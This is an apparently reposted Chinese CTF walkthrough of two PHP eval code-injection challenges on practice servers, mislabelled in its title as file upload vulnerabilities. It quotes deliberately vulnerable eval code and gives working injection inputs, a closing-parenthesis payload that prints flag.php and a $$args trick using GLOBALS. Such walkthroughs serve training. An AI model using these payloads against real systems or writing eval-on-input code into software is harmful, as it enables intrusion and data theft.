典型的文件上传漏洞
Posted whitehatkevil
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了典型的文件上传漏洞相关的知识,希望对你有一定的参考价值。
案例一
URL:http://120.24.86.145:8003/
代码
<?php include "waf.php"; include "flag.php"; $a = @$_REQUEST[‘hello‘]; eval( "var_dump($a);"); show_source(__FILE__); ?>
其实就是拼接eval
可构造如下语句:
1);print_r(file(flag.php));//
到了代码里就是
eval( "var_dump(1);print_r(file(flag.php));//);");
案例二
URL:http://120.24.86.145:8004/index1.php
flag In the variable ! <?php
error_reporting(0);// 关闭php错误显示
include "flag1.php";// 引入flag1.php文件代码
highlight_file(__file__);
if(isset($_GET[‘args‘])){// 通过get方式传递 args变量才能执行if里面的代码
$args = $_GET[‘args‘];
if(!preg_match("/^w+$/",$args)){// 这个正则表达式的意思是匹配任意 [A-Za-z0-9_] 的字符,就是任意大小写字母和0到9以及下划线组成
die("args error!");
}
eval("var_dump($$args);");// 这边告诉我们这题是代码审计的题目
}
?>
这个可以注意一下eval很明显$$.首先他说如果不符合那个正则就die。w的意思是所有的字母。也就是说$args必须要是字母才行。倘若是GLOBALS到eval就是eval("var_dump($GLOBALS);");
以上是关于典型的文件上传漏洞的主要内容,如果未能解决你的问题,请参考以下文章